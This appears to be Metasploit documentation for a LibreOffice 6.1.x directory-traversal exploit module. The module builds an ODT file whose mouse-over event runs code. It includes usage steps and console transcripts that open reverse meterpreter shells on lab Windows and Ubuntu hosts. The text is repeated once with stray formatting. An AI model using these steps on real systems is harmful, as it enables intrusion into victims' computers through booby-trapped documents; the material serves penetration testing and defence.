documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md

## Description

  This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.2.1` that enables remote code execution.
  Note: `6.0.x` and `6.1.3.x` versions are reportedly vulnerable to the directory traversal attack, but are not exploitable by
  this module due to the lack of ability to pass arguments.

  LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events
  to them. A macro can be tied to a program event by including the script that contains the macro and the function
  name to be executed. Additionally, a directory traversal vulnerability exists in the component that references the
  Python script to be executed. This allows a program event to execute functions from Python scripts relative to the
  path of the samples macros folder. The `pydoc.py` script included with LibreOffice contains the `tempfilepager` function
  that passes arguments to `os.system`, allowing RCE.

  This module generates an ODT file with a mouse over event that when triggered, will execute arbitrary code.

## Vulnerable Application

  LibreOffice `v6.1.0-6.1.4.1`. Vulnerable versions for both Windows and Linux can be found [here](https://downloadarchive.documentfoundation.org/libreoffice/old/).

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/multi/fileformat/libreoffice_macro_exec```
  4. Do: ```set FILENAME <name>```
  5. Do: ```set LHOST <ip>```
  6. Do: ```set LPORT <port>```
  7. Do: ```run```
  8. Move the generated file to the target
  9. Start a handler
 10. Open the file with a vulnerable version of LibreOffice
 11. You should get a shell.

## Scenarios

### Tested on LibreOffice 6.1.2.1 running Windows 7

  ```
  msf5 > use exploit/multi/fileformat/libreoffice_macro_exec 
  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run

  [+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444 
  [*] Sending stage (179779 bytes) to 192.168.37.156
  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.156:49180) at 2019-04-12 15:14:04 -0500

  meterpreter > getuid
  Server username: WIN-MGMN7ND70I1\a_user
  meterpreter > sysinfo
  Computer        : WIN-MGMN7ND70I1
  OS              : Windows 7 (Build 7601, Service Pack 1).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 1
  Meterpreter     : x86/windows
  ```

### Tested on LibreOffice 6.1.0.1 running Ubuntu 18.04

  ```
  msf5 > use exploit/multi/fileformat/libreoffice_macro_exec
  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set target 1
  target => 1
  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run

  [+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
  msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
  msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
  payload => linux/x86/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set LHOST 192.168.37.1
  LHOST => 192.168.37.1
  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444
  [*] Sending stage (985320 bytes) to 192.168.37.174
  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.174:39912) at 2019-04-12 14:50:08 -0500

  meterpreter > getuid
  Server username: uid=1000, gid=1000, euid=1000, egid=1000
  meterpreter > sysinfo
  Computer     : 192.168.37.174
  OS           : Ubuntu 18.04 (Linux 4.18.0-16-generic)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  ```
Land #11729 , Add Libreoffice macro exec exploit module 2019-04-17 13:21:11 -05:00			`## Description`

			This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.2.1` that enables remote code execution.
			Note: `6.0.x` and `6.1.3.x` versions are reportedly vulnerable to the directory traversal attack, but are not exploitable by
			`this module due to the lack of ability to pass arguments.`

			`LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events`
			`to them. A macro can be tied to a program event by including the script that contains the macro and the function`
			`name to be executed. Additionally, a directory traversal vulnerability exists in the component that references the`
			`Python script to be executed. This allows a program event to execute functions from Python scripts relative to the`
			path of the samples macros folder. The `pydoc.py` script included with LibreOffice contains the `tempfilepager` function
			that passes arguments to `os.system`, allowing RCE.

			`This module generates an ODT file with a mouse over event that when triggered, will execute arbitrary code.`

			`## Vulnerable Application`

			LibreOffice `v6.1.0-6.1.4.1`. Vulnerable versions for both Windows and Linux can be found [here](https://downloadarchive.documentfoundation.org/libreoffice/old/).

			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. Do: ```use exploit/multi/fileformat/libreoffice_macro_exec```
			4. Do: ```set FILENAME <name>```
			5. Do: ```set LHOST <ip>```
			6. Do: ```set LPORT <port>```
			7. Do: ```run```
			`8. Move the generated file to the target`
			`9. Start a handler`
			`10. Open the file with a vulnerable version of LibreOffice`
			`11. You should get a shell.`

			`## Scenarios`

			`### Tested on LibreOffice 6.1.2.1 running Windows 7`

			```
			`msf5 > use exploit/multi/fileformat/libreoffice_macro_exec`
			`msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1`
			`lhost => 192.168.37.1`
			`msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run`

			`[+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt`
			`msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler`
			`msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp`
			`payload => windows/meterpreter/reverse_tcp`
			`msf5 exploit(multi/handler) > set lhost 192.168.37.1`
			`lhost => 192.168.37.1`
			`msf5 exploit(multi/handler) > run`

			`[*] Started reverse TCP handler on 192.168.37.1:4444`
			`[*] Sending stage (179779 bytes) to 192.168.37.156`
			`[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.156:49180) at 2019-04-12 15:14:04 -0500`

			`meterpreter > getuid`
			`Server username: WIN-MGMN7ND70I1\a_user`
			`meterpreter > sysinfo`
			`Computer : WIN-MGMN7ND70I1`
			`OS : Windows 7 (Build 7601, Service Pack 1).`
			`Architecture : x64`
			`System Language : en_US`
			`Domain : WORKGROUP`
			`Logged On Users : 1`
			`Meterpreter : x86/windows`
			```

			`### Tested on LibreOffice 6.1.0.1 running Ubuntu 18.04`

			```
			`msf5 > use exploit/multi/fileformat/libreoffice_macro_exec`
			`msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set target 1`
			`target => 1`
			`msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1`
			`lhost => 192.168.37.1`
			`msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run`

			`[+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt`
			`msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler`
			`msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp`
			`payload => linux/x86/meterpreter/reverse_tcp`
			`msf5 exploit(multi/handler) > set LHOST 192.168.37.1`
			`LHOST => 192.168.37.1`
			`msf5 exploit(multi/handler) > run`

			`[*] Started reverse TCP handler on 192.168.37.1:4444`
			`[*] Sending stage (985320 bytes) to 192.168.37.174`
			`[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.174:39912) at 2019-04-12 14:50:08 -0500`

			`meterpreter > getuid`
			`Server username: uid=1000, gid=1000, euid=1000, egid=1000`
			`meterpreter > sysinfo`
			`Computer : 192.168.37.174`
			`OS : Ubuntu 18.04 (Linux 4.18.0-16-generic)`
			`Architecture : x64`
			`BuildTuple : i486-linux-musl`
			`Meterpreter : x86/linux`
			```